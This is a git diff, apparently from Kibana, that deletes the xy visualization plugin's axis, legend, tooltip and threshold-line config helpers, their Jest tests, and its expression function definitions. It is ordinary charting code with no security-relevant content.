@@ -1,78 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { getScale } from './get_axis'; -import type { Scale } from '../types'; - -describe('getScale', () => { - const axisScale = { - type: 'linear', - mode: 'normal', - scaleType: 'linear', - } as Scale; - - it('returns linear type for a number', () => { - const format = { id: 'number' }; - const scale = getScale(axisScale, {}, format, true); - expect(scale.type).toBe('linear'); - }); - - it('returns ordinal type for a terms aggregation on a number field', () => { - const format = { - id: 'terms', - params: { - id: 'number', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }; - const scale = getScale(axisScale, {}, format, true); - expect(scale.type).toBe('ordinal'); - }); - - it('returns ordinal type for a terms aggregation on a string field', () => { - const format = { - id: 'terms', - params: { - id: 'string', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }; - const scale = getScale(axisScale, {}, format, true); - expect(scale.type).toBe('ordinal'); - }); - - it('returns ordinal type for a range aggregation on a number field', () => { - const format = { - id: 'range', - params: { - id: 'number', - }, - }; - const scale = getScale(axisScale, {}, format, true); - expect(scale.type).toBe('ordinal'); - }); - - it('returns time type for a date histogram aggregation', () => { - const format = { - id: 'date', - params: { - pattern: 'HH:mm', - }, - }; - const scale = getScale(axisScale, { date: true }, format, true); - expect(scale.type).toBe('time'); - }); - - it('returns linear type for an histogram aggregation', () => { - const format = { id: 
'number' };
- const scale = getScale(axisScale, { interval: 1 }, format, true);
- expect(scale.type).toBe('linear');
- });
-});
diff --git a/src/plugins/vis_types/xy/public/config/get_axis.ts b/src/plugins/vis_types/xy/public/config/get_axis.ts
deleted file mode 100644
index 62e2345c80566..0000000000000
--- a/src/plugins/vis_types/xy/public/config/get_axis.ts
+++ /dev/null
@@ -1,199 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { identity } from 'lodash'; - -import { AxisSpec, TickFormatter, YDomainRange, ScaleType as ECScaleType } from '@elastic/charts'; - -import { LabelRotation } from '@kbn/charts-plugin/public'; -import { BUCKET_TYPES } from '@kbn/data-plugin/public'; -import { MULTILAYER_TIME_AXIS_STYLE } from '@kbn/charts-plugin/common'; - -import { - Aspect, - CategoryAxis, - Grid, - AxisConfig, - TickOptions, - ScaleConfig, - Scale, - ScaleType, - AxisType, - XScaleType, - YScaleType, - SeriesParam, -} from '../types'; - -export function getAxis( - { type, title: axisTitle, labels, scale: axisScale, ...axis }: CategoryAxis, - { categoryLines, valueAxis }: Grid, - { params, format, formatter, title: fallbackTitle = '', aggType }: Aspect, - seriesParams: SeriesParam[], - isDateHistogram = false, - useMultiLayerTimeAxis = false, - darkMode = false -): AxisConfig { - const isCategoryAxis = type === AxisType.Category; - // Hide unassigned axis, not supported in elastic charts - // TODO: refactor when disallowing unassigned axes - // https://github.com/elastic/kibana/issues/82752 - const show = - (isCategoryAxis || seriesParams.some(({ valueAxis: id }) => id === axis.id)) && axis.show; - const groupId = axis.id; - - const grid = isCategoryAxis - ? { - show: categoryLines, - } - : { - show: valueAxis === axis.id, - }; - // Date range formatter applied on xAccessor - const tickFormatter = - aggType === BUCKET_TYPES.DATE_RANGE || aggType === BUCKET_TYPES.RANGE ? 
identity : formatter; - const ticks: TickOptions = { - formatter: tickFormatter, - labelFormatter: getLabelFormatter(labels.truncate, tickFormatter), - show: labels.show, - rotation: labels.rotate, - showOverlappingLabels: !labels.filter, - showDuplicates: !labels.filter, - }; - const scale = getScale(axisScale, params, format, isCategoryAxis); - const title = axisTitle.text || fallbackTitle; - const fallbackRotation = - isCategoryAxis && isDateHistogram ? LabelRotation.Horizontal : LabelRotation.Vertical; - - return { - ...axis, - show, - groupId, - title, - ticks, - grid, - scale, - style: getAxisStyle(useMultiLayerTimeAxis, darkMode, ticks, title, fallbackRotation), - domain: getAxisDomain(scale, isCategoryAxis), - integersOnly: aggType === 'count', - timeAxisLayerCount: useMultiLayerTimeAxis ? 3 : 0, - }; -} - -function getLabelFormatter( - truncate?: number | null, - formatter?: TickFormatter -): TickFormatter | undefined { - if (truncate === null || truncate === undefined) { - return formatter; - } - - return (value: any) => { - const finalValue = `${formatter ? formatter(value) : value}`; - - if (finalValue.length > truncate) { - return `${finalValue.slice(0, truncate)}...`; - } - - return finalValue; - }; -} - -function getScaleType( - scale?: Scale, - isNumber?: boolean, - isTime = false, - isHistogram = false -): ECScaleType | undefined { - if (isTime) return ECScaleType.Time; - if (isHistogram) return ECScaleType.Linear; - - if (!isNumber) { - return ECScaleType.Ordinal; - } - - const type = scale?.type; - if (type === ScaleType.SquareRoot) { - return ECScaleType.Sqrt; - } - - return type; -} - -export function getScale( - scale: Scale, - params: Aspect['params'], - format: Aspect['format'], - isCategoryAxis: boolean -): ScaleConfig { - const type = ( - isCategoryAxis - ? 
getScaleType( - scale, - format?.id === 'number' || - (format?.params?.id === 'number' && - format?.id !== BUCKET_TYPES.RANGE && - format?.id !== BUCKET_TYPES.TERMS), - 'date' in params, - 'interval' in params - ) - : getScaleType(scale, true) - ) as S; - - return { - ...scale, - type, - }; -} - -function getAxisStyle( - isMultiLayerTimeAxis: boolean, - darkMode: boolean, - ticks?: TickOptions, - title?: string, - rotationFallback: LabelRotation = LabelRotation.Vertical -): AxisSpec['style'] { - return isMultiLayerTimeAxis - ? { - ...MULTILAYER_TIME_AXIS_STYLE, - tickLabel: { - ...MULTILAYER_TIME_AXIS_STYLE.tickLabel, - visible: Boolean(ticks?.show), - }, - tickLine: { - ...MULTILAYER_TIME_AXIS_STYLE.tickLine, - visible: Boolean(ticks?.show), - }, - axisTitle: { - visible: (title ?? '').trim().length > 0, - }, - } - : { - axisTitle: { - visible: (title ?? '').trim().length > 0, - }, - tickLabel: { - visible: Boolean(ticks?.show), - rotation: -(ticks?.rotation ?? rotationFallback), - }, - }; -} - -function getAxisDomain( - scale: ScaleConfig, - isCategoryAxis: boolean -): YDomainRange | undefined { - if (isCategoryAxis || !scale) { - return; - } - - const { min, max, defaultYExtents, boundsMargin } = scale; - const fit = defaultYExtents; - const padding = boundsMargin || undefined; - - return { fit, padding, min: min ?? NaN, max: max ?? NaN }; -} diff --git a/src/plugins/vis_types/xy/public/config/get_config.test.ts b/src/plugins/vis_types/xy/public/config/get_config.test.ts deleted file mode 100644 index 7608ef7cda460..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_config.test.ts +++ /dev/null 
@@ -1,107 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { getConfig } from './get_config'; -import { visData, visDataPercentile, visParamsWithTwoYAxes } from '../mocks'; -import { VisParams } from '../types'; - -// ToDo: add more tests for all the config properties -describe('getConfig', () => { - it('identifies it as a timeChart if the x axis has a date field', () => { - const config = getConfig(visData, visParamsWithTwoYAxes); - expect(config.isTimeChart).toBe(true); - }); - - it('not adds the current time marker if the param is set to false', () => { - const config = getConfig(visData, visParamsWithTwoYAxes); - expect(config.showCurrentTime).toBe(false); - }); - - it('adds the current time marker if the param is set to false', () => { - const newVisParams = { - ...visParamsWithTwoYAxes, - addTimeMarker: true, - }; - const config = getConfig(visData, newVisParams); - expect(config.showCurrentTime).toBe(true); - }); - - it('enables the histogram mode for a date_histogram', () => { - const config = getConfig(visData, visParamsWithTwoYAxes); - expect(config.enableHistogramMode).toBe(true); - }); - - it('assigns the correct formatter per y axis', () => { - const config = getConfig(visData, visParamsWithTwoYAxes); - expect(config.yAxes.length).toBe(2); - expect(config.yAxes[0].ticks?.formatter).toStrictEqual(config.aspects.y[0].formatter); - expect(config.yAxes[1].ticks?.formatter).toStrictEqual(config.aspects.y[1].formatter); - }); - - it('assigns the correct number of yAxes if the agg is hidden', () => { - // We have two axes but the one y dimension is hidden - const newVisParams = { - ...visParamsWithTwoYAxes, - dimensions: { - 
...visParamsWithTwoYAxes.dimensions, - y: [ - { - label: 'Average memory', - aggType: 'avg', - params: {}, - accessor: 1, - format: { - id: 'number', - params: {}, - }, - }, - ], - }, - }; - const config = getConfig(visData, newVisParams); - expect(config.yAxes.length).toBe(1); - }); - - it('assigns the correct number of yAxes if the agg is Percentile', () => { - const newVisParams = { - ...visParamsWithTwoYAxes, - seriesParams: [ - { - type: 'line', - data: { - label: 'Percentiles of bytes', - id: '1', - }, - drawLinesBetweenPoints: true, - interpolate: 'linear', - lineWidth: 2, - mode: 'normal', - show: true, - showCircles: true, - circlesRadius: 3, - valueAxis: 'ValueAxis-1', - }, - ], - dimensions: { - ...visParamsWithTwoYAxes.dimensions, - y: ['1st', '5th', '25th', '50th', '75th', '95th', '99th'].map((prefix, accessor) => ({ - label: `${prefix} percentile of bytes`, - aggType: 'percentiles', - params: {}, - accessor, - format: { - id: 'number', - params: {}, - }, - })), - }, - } as VisParams; - const config = getConfig(visDataPercentile, newVisParams); - expect(config.yAxes.length).toBe(1); - }); -}); diff --git a/src/plugins/vis_types/xy/public/config/get_config.ts b/src/plugins/vis_types/xy/public/config/get_config.ts deleted file mode 100644 index 1a78b65f19f33..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_config.ts +++ /dev/null 
@@ -1,146 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { Fit, ScaleContinuousType } from '@elastic/charts';
-
-import { Datatable } from '@kbn/expressions-plugin/public';
-import { BUCKET_TYPES } from '@kbn/data-plugin/public';
-import { DateHistogramParams } from '@kbn/visualizations-plugin/public';
-
-import {
- Aspect,
- AxisConfig,
- SeriesParam,
- VisConfig,
- VisParams,
- XScaleType,
- YScaleType,
-} from '../types';
-import { getThresholdLine } from './get_threshold_line';
-import { getRotation } from './get_rotation';
-import { getTooltip } from './get_tooltip';
-import { getLegend } from './get_legend';
-import { getAxis } from './get_axis';
-import { getAspects } from './get_aspects';
-import { ChartType } from '..';
-import { getSafeId } from '../utils/accessors';
-
-export function getConfig(
- table: Datatable,
- params: VisParams,
- useLegacyTimeAxis = false,
- darkMode = false
-): VisConfig {
- const {
- thresholdLine,
- orderBucketsBySum,
- addTimeMarker,
- radiusRatio,
- labels,
- fittingFunction,
- detailedTooltip,
- isVislibVis,
- fillOpacity,
- } = params;
- const aspects = getAspects(table.columns, params.dimensions);
- const tooltip = getTooltip(aspects, params);
-
- const yAxes: Array> = [];
-
- // avoid duplicates based on aggId
- const aspectVisited = new Set();
- params.dimensions.y.forEach((y) => {
- const accessor = y.accessor;
- const aspect = aspects.y.find(({ column }) => column === accessor);
- const aggId = getSafeId(aspect?.aggId);
- const serie = params.seriesParams.find(({ data: { id } }) => id === aggId);
- const valueAxis = params.valueAxes.find(({ id }) => id === serie?.valueAxis);
- if (aspect && valueAxis && !aspectVisited.has(aggId)) {
- yAxes.push(getAxis(valueAxis, params.grid, aspect, params.seriesParams));
- aspectVisited.add(aggId);
- }
- });
-
- const rotation = getRotation(params.categoryAxes[0]);
-
- const isDateHistogram = params.dimensions.x?.aggType === BUCKET_TYPES.DATE_HISTOGRAM;
- const isHistogram = params.dimensions.x?.aggType === BUCKET_TYPES.HISTOGRAM;
- const enableHistogramMode =
- (isDateHistogram || isHistogram) &&
- shouldEnableHistogramMode(params.seriesParams, aspects.y, yAxes);
-
- const useMultiLayerTimeAxis =
- enableHistogramMode && isDateHistogram && !useLegacyTimeAxis && rotation === 0;
-
- const xAxis = getAxis(
- params.categoryAxes[0],
- params.grid,
- aspects.x,
- params.seriesParams,
- isDateHistogram,
- useMultiLayerTimeAxis,
- darkMode
- );
-
- const isTimeChart = (aspects.x.params as DateHistogramParams).date ?? false;
-
- return {
- // NOTE: downscale ratio to match current vislib implementation
- markSizeRatio: radiusRatio * 0.6,
- fittingFunction: fittingFunction ?? Fit.Linear,
- fillOpacity,
- detailedTooltip,
- orderBucketsBySum,
- isTimeChart,
- isVislibVis,
- showCurrentTime: addTimeMarker && isTimeChart,
- showValueLabel: labels.show ?? false,
- enableHistogramMode,
- tooltip,
- aspects,
- xAxis,
- yAxes,
- legend: getLegend(params),
- rotation,
- thresholdLine: getThresholdLine(thresholdLine, yAxes, params.seriesParams),
- };
-}
-
-/**
- * disables histogram mode for any config that has non-stacked clustered bars
- *
- * @param seriesParams
- * @param yAspects
- * @param yAxes
- */
-const shouldEnableHistogramMode = (
- seriesParams: SeriesParam[],
- yAspects: Aspect[],
- yAxes: Array>
-): boolean => {
- const bars = seriesParams.filter(({ type, data: { id: paramId } }) => {
- return (
- type === ChartType.Histogram && yAspects.find(({ aggId }) => aggId === paramId) !== undefined
- );
- });
-
- const groupIds = [
- ...bars.reduce>((acc, { valueAxis: groupId, mode }) => {
- acc.add(groupId);
- return acc;
- }, new Set()),
- ];
-
- if (groupIds.length > 1) {
- return false;
- }
-
- return bars.every(({ valueAxis: groupId, mode }) => {
- return mode === 'stacked';
- });
-};
diff --git a/src/plugins/vis_types/xy/public/config/get_legend.ts b/src/plugins/vis_types/xy/public/config/get_legend.ts
deleted file mode 100644
index 9a1c9e4bc9c58..0000000000000
--- a/src/plugins/vis_types/xy/public/config/get_legend.ts
+++ /dev/null
@@ -1,16 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { LegendOptions, VisParams } from '../types';
-
-export function getLegend({ addLegend, legendPosition }: VisParams): LegendOptions {
- return {
- show: addLegend,
- position: legendPosition,
- };
-}
diff --git a/src/plugins/vis_types/xy/public/config/get_rotation.ts b/src/plugins/vis_types/xy/public/config/get_rotation.ts
deleted file mode 100644
index 44c6a46357eb1..0000000000000
--- a/src/plugins/vis_types/xy/public/config/get_rotation.ts
+++ /dev/null
@@ -1,19 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { Rotation } from '@elastic/charts';
-
-import { CategoryAxis } from '../types';
-
-export function getRotation({ position }: CategoryAxis): Rotation {
- if (position === 'left' || position === 'right') {
- return 90;
- }
-
- return 0;
-}
diff --git a/src/plugins/vis_types/xy/public/config/get_threshold_line.ts b/src/plugins/vis_types/xy/public/config/get_threshold_line.ts
deleted file mode 100644
index 64eb7e5e24a80..0000000000000
--- a/src/plugins/vis_types/xy/public/config/get_threshold_line.ts
+++ /dev/null
@@ -1,44 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import {
- ThresholdLineConfig,
- ThresholdLine,
- ThresholdLineStyle,
- AxisConfig,
- SeriesParam,
- YScaleType,
-} from '../types';
-
-export function getThresholdLine(
- { style, ...rest }: ThresholdLine,
- yAxes: Array>,
- seriesParams: SeriesParam[]
-): ThresholdLineConfig {
- const groupId = yAxes.find(({ id }) =>
- seriesParams.some(({ valueAxis }) => id === valueAxis)
- )?.groupId;
-
- return {
- ...rest,
- dash: getDash(style),
- groupId,
- };
-}
-
-function getDash(style: ThresholdLineStyle): number[] | undefined {
- switch (style) {
- case ThresholdLineStyle.Dashed:
- return [10, 5];
- case ThresholdLineStyle.DotDashed:
- return [20, 5, 5, 5];
- case ThresholdLineStyle.Full:
- default:
- return;
- }
-}
diff --git a/src/plugins/vis_types/xy/public/config/get_tooltip.ts b/src/plugins/vis_types/xy/public/config/get_tooltip.ts
deleted file mode 100644
index 69961cbed7699..0000000000000
--- a/src/plugins/vis_types/xy/public/config/get_tooltip.ts
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { TooltipType } from '@elastic/charts';
-
-import { Aspects, VisParams, TooltipConfig } from '../types';
-import { getDetailedTooltip } from '../components/detailed_tooltip';
-
-export function getTooltip(
- aspects: Aspects,
- { addTooltip, detailedTooltip }: VisParams
-): TooltipConfig {
- return {
- type: addTooltip ? TooltipType.VerticalCursor : TooltipType.None,
- detailedTooltip: detailedTooltip ? getDetailedTooltip(aspects) : undefined,
- };
-}
diff --git a/src/plugins/vis_types/xy/public/expression_functions/category_axis.ts b/src/plugins/vis_types/xy/public/expression_functions/category_axis.ts
deleted file mode 100644
index 5283a54e57f30..0000000000000
--- a/src/plugins/vis_types/xy/public/expression_functions/category_axis.ts
+++ /dev/null
@@ -1,116 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { CategoryAxis } from '../types'; -import type { ExpressionValueScale } from './vis_scale'; -import type { ExpressionValueLabel } from './label'; - -export interface Arguments extends Omit { - title?: string; - scale: ExpressionValueScale; - labels: ExpressionValueLabel; -} - -export type ExpressionValueCategoryAxis = ExpressionValueBoxed< - 'category_axis', - { - id: CategoryAxis['id']; - show: CategoryAxis['show']; - position: CategoryAxis['position']; - axisType: CategoryAxis['type']; - title: { - text?: string; - }; - labels: CategoryAxis['labels']; - scale: CategoryAxis['scale']; - } ->; - -export const categoryAxis = (): ExpressionFunctionDefinition< - 'categoryaxis', - Datatable | null, - Arguments, - ExpressionValueCategoryAxis -> => ({ - name: 'categoryaxis', - help: i18n.translate('visTypeXy.function.categoryAxis.help', { - defaultMessage: 'Generates category axis object', - }), - type: 'category_axis', - args: { - id: { - types: ['string'], - help: i18n.translate('visTypeXy.function.categoryAxis.id.help', { - defaultMessage: 'Id of category axis', - }), - required: true, - }, - show: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.categoryAxis.show.help', { - defaultMessage: 'Show the category axis', - }), - required: true, - }, - position: { - types: ['string'], - help: i18n.translate('visTypeXy.function.categoryAxis.position.help', { - defaultMessage: 'Position of the category axis', - }), 
- required: true, - }, - type: { - types: ['string'], - help: i18n.translate('visTypeXy.function.categoryAxis.type.help', { - defaultMessage: 'Type of the category axis. Can be category or value', - }), - required: true, - }, - title: { - types: ['string'], - help: i18n.translate('visTypeXy.function.categoryAxis.title.help', { - defaultMessage: 'Title of the category axis', - }), - }, - scale: { - types: ['vis_scale'], - help: i18n.translate('visTypeXy.function.categoryAxis.scale.help', { - defaultMessage: 'Scale config', - }), - }, - labels: { - types: ['label'], - help: i18n.translate('visTypeXy.function.categoryAxis.labels.help', { - defaultMessage: 'Axis label config', - }), - }, - }, - fn: (context, args) => { - return { - type: 'category_axis', - id: args.id, - show: args.show, - position: args.position, - axisType: args.type, - title: { - text: args.title, - }, - scale: { - ...args.scale, - type: args.scale.scaleType, - }, - labels: args.labels, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/index.ts b/src/plugins/vis_types/xy/public/expression_functions/index.ts deleted file mode 100644 index 4d6b2305a3651..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/index.ts +++ /dev/null 
@@ -1,24 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-export { visTypeXyVisFn } from './xy_vis_fn';
-
-export type { ExpressionValueCategoryAxis } from './category_axis';
-export { categoryAxis } from './category_axis';
-export type { ExpressionValueTimeMarker } from './time_marker';
-export { timeMarker } from './time_marker';
-export type { ExpressionValueValueAxis } from './value_axis';
-export { valueAxis } from './value_axis';
-export type { ExpressionValueSeriesParam } from './series_param';
-export { seriesParam } from './series_param';
-export type { ExpressionValueThresholdLine } from './threshold_line';
-export { thresholdLine } from './threshold_line';
-export type { ExpressionValueLabel } from './label';
-export { label } from './label';
-export type { ExpressionValueScale } from './vis_scale';
-export { visScale } from './vis_scale';
diff --git a/src/plugins/vis_types/xy/public/expression_functions/label.ts b/src/plugins/vis_types/xy/public/expression_functions/label.ts
deleted file mode 100644
index cd3eea2b68bc7..0000000000000
--- a/src/plugins/vis_types/xy/public/expression_functions/label.ts
+++ /dev/null
@@ -1,89 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { Labels } from '@kbn/charts-plugin/public'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; - -export type ExpressionValueLabel = ExpressionValueBoxed< - 'label', - { - color?: Labels['color']; - filter?: Labels['filter']; - overwriteColor?: Labels['overwriteColor']; - rotate?: Labels['rotate']; - show?: Labels['show']; - truncate?: Labels['truncate']; - } ->; - -export const label = (): ExpressionFunctionDefinition< - 'label', - Datatable | null, - Labels, - ExpressionValueLabel -> => ({ - name: 'label', - help: i18n.translate('visTypeXy.function.label.help', { - defaultMessage: 'Generates label object', - }), - type: 'label', - args: { - color: { - types: ['string'], - help: i18n.translate('visTypeXy.function.label.color.help', { - defaultMessage: 'Color of label', - }), - }, - filter: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.label.filter.help', { - defaultMessage: 'Hides overlapping labels and duplicates on axis', - }), - }, - overwriteColor: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.label.overwriteColor.help', { - defaultMessage: 'Overwrite color', - }), - }, - rotate: { - types: ['number'], - help: i18n.translate('visTypeXy.function.label.rotate.help', { - defaultMessage: 'Rotate angle', - }), - }, - show: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.label.show.help', { - defaultMessage: 'Show label', - }), - }, - truncate: { - types: ['number', 'null'], - help: 
i18n.translate('visTypeXy.function.label.truncate.help', { - defaultMessage: 'The number of symbols before truncating', - }), - }, - }, - fn: (context, args) => { - return { - type: 'label', - color: args.color, - filter: args.hasOwnProperty('filter') ? args.filter : undefined, - overwriteColor: args.overwriteColor, - rotate: args.rotate, - show: args.show, - truncate: args.truncate, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/series_param.ts b/src/plugins/vis_types/xy/public/expression_functions/series_param.ts deleted file mode 100644 index df5ed2ec0d9b4..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/series_param.ts +++ /dev/null 
@@ -1,136 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { SeriesParam } from '../types'; - -export interface Arguments extends Omit { - label: string; - id: string; -} - -export type ExpressionValueSeriesParam = ExpressionValueBoxed< - 'series_param', - { - data: { label: string; id: string }; - drawLinesBetweenPoints?: boolean; - interpolate?: SeriesParam['interpolate']; - lineWidth?: number; - mode: SeriesParam['mode']; - show: boolean; - showCircles: boolean; - circlesRadius: number; - seriesParamType: SeriesParam['type']; - valueAxis: string; - } ->; - -export const seriesParam = (): ExpressionFunctionDefinition< - 'seriesparam', - Datatable, - Arguments, - ExpressionValueSeriesParam -> => ({ - name: 'seriesparam', - help: i18n.translate('visTypeXy.function.seriesparam.help', { - defaultMessage: 'Generates series param object', - }), - type: 'series_param', - inputTypes: ['datatable'], - args: { - label: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.label.help', { - defaultMessage: 'Name of series param', - }), - required: true, - }, - id: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.id.help', { - defaultMessage: 'Id of series param', - }), - required: true, - }, - drawLinesBetweenPoints: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.seriesParam.drawLinesBetweenPoints.help', { - defaultMessage: 'Draw lines between points', - }), - }, - interpolate: { - types: ['string'], - help: 
i18n.translate('visTypeXy.function.seriesParam.interpolate.help', { - defaultMessage: 'Interpolate mode. Can be linear, cardinal or step-after', - }), - }, - show: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.seriesParam.show.help', { - defaultMessage: 'Show param', - }), - required: true, - }, - lineWidth: { - types: ['number'], - help: i18n.translate('visTypeXy.function.seriesParam.lineWidth.help', { - defaultMessage: 'Width of line', - }), - }, - mode: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.mode.help', { - defaultMessage: 'Chart mode. Can be stacked or percentage', - }), - }, - showCircles: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.seriesParam.showCircles.help', { - defaultMessage: 'Show circles', - }), - }, - circlesRadius: { - types: ['number'], - help: i18n.translate('visTypeXy.function.seriesParam.circlesRadius.help', { - defaultMessage: 'Defines the circles size (radius)', - }), - }, - type: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.type.help', { - defaultMessage: 'Chart type. Can be line, area or histogram', - }), - }, - valueAxis: { - types: ['string'], - help: i18n.translate('visTypeXy.function.seriesParam.valueAxis.help', { - defaultMessage: 'Name of value axis', - }), - }, - }, - fn: (context, args) => { - return { - type: 'series_param', - data: { label: args.label, id: args.id }, - drawLinesBetweenPoints: args.drawLinesBetweenPoints, - interpolate: args.interpolate, - lineWidth: args.lineWidth, - mode: args.mode, - show: args.show, - showCircles: args.showCircles, - circlesRadius: args.circlesRadius, - seriesParamType: args.type, - valueAxis: args.valueAxis, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/threshold_line.ts b/src/plugins/vis_types/xy/public/expression_functions/threshold_line.ts deleted file mode 100644 index 9a496158bf5a7..0000000000000 
--- a/src/plugins/vis_types/xy/public/expression_functions/threshold_line.ts
+++ /dev/null
@@ -1,86 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { ThresholdLine } from '../types'; - -export type ExpressionValueThresholdLine = ExpressionValueBoxed< - 'threshold_line', - { - show: ThresholdLine['show']; - value: ThresholdLine['value']; - width: ThresholdLine['width']; - style: ThresholdLine['style']; - color: ThresholdLine['color']; - } ->; - -export const thresholdLine = (): ExpressionFunctionDefinition< - 'thresholdline', - Datatable | null, - ThresholdLine, - ExpressionValueThresholdLine -> => ({ - name: 'thresholdline', - help: i18n.translate('visTypeXy.function.thresholdLine.help', { - defaultMessage: 'Generates threshold line object', - }), - type: 'threshold_line', - args: { - show: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.thresholdLine.show.help', { - defaultMessage: 'Show threshould line', - }), - required: true, - }, - value: { - types: ['number', 'null'], - help: i18n.translate('visTypeXy.function.thresholdLine.value.help', { - defaultMessage: 'Threshold value', - }), - required: true, - }, - width: { - types: ['number', 'null'], - help: i18n.translate('visTypeXy.function.thresholdLine.width.help', { - defaultMessage: 'Width of threshold line', - }), - required: true, - }, - style: { - types: ['string'], - help: i18n.translate('visTypeXy.function.thresholdLine.style.help', { - defaultMessage: 'Style of threshold line. 
Can be full, dashed or dot-dashed', - }), - required: true, - }, - color: { - types: ['string'], - help: i18n.translate('visTypeXy.function.thresholdLine.color.help', { - defaultMessage: 'Color of threshold line', - }), - required: true, - }, - }, - fn: (context, args) => { - return { - type: 'threshold_line', - show: args.show, - value: args.value, - width: args.width, - style: args.style, - color: args.color, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/time_marker.ts b/src/plugins/vis_types/xy/public/expression_functions/time_marker.ts deleted file mode 100644 index f3b8e9cdc61d0..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/time_marker.ts +++ /dev/null 
